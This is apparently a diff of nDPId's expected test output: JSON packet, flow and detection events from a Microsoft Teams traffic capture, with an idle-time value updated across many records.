+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041673412} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041673611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041674611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":8,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041675409} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041675611} @@ -23,49 +23,49 @@ 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1587041676010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041676010,"pkt":"KDc3AG3IEBMx8Tl2CABFAABfTWlAADkRcM3AqAEBwKgBBgA17Y0ASwAAzp2BgAABAAEAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQABwAwAAQABAAAACQAENHJNIQ=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1587041676405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676405,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex0AbuczSMoSaIgqYAQEAmVMgAAAQEICjCEl5xhBkyo"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676435,"flow_last_seen":1587041676435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1587041676405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676405,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex0AbuczSMoSaIgqYAQEAmVMgAAAQEICjCEl5xhBkyo"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676435,"flow_last_seen":1587041676435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} 